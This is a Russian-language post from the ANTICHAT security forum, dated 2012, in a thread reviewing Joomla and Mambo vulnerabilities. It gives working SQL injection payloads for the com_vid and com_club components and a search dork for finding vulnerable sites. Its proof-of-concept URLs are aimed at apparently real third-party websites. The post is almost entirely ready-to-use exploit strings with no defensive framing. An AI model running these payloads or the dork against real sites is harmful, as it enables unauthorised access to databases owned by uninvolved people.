Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

16.01.2012, 18:57

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Joomla "com_vid" component SQL Injection

Уязвим параметр id, что позволяет провести SQL-injection.

Эксплyатация:

Код:

Code:
http://site.ltd/index.php?option=com_vid&Itemid=60&section=video&id_catigor=1&id=-1+union+select+1,2,version(),database(),5,6,7--+f

PoC:

Код:

Code:
http://sasha-shmel.ru/index.php?option=com_vid&Itemid=60&section=video&id_catigor=1&id=-1+union+select+1,2,version(),database(),5,6,7--+f

---

Joomla "com_club" component SQL Injection

Уязвим параметр clubid, что позволяет провести SQL-injection.

Dork:

Код:

Code:
inurl:"?option=com_club"

Результатов: примерно 21 000, страница 4 (0,30 сек.)

Эксплyатация:

Код:

Code:
http://site.ltd/index.php?option=com_club&task=detail&clubid=-70002+union+select+version(),database(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+f

PoC:

Код:

Code:
http://vbl.badmintonliga.be/index.php?option=com_club&task=detail&clubid=-70002+union+select+version(),database(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+f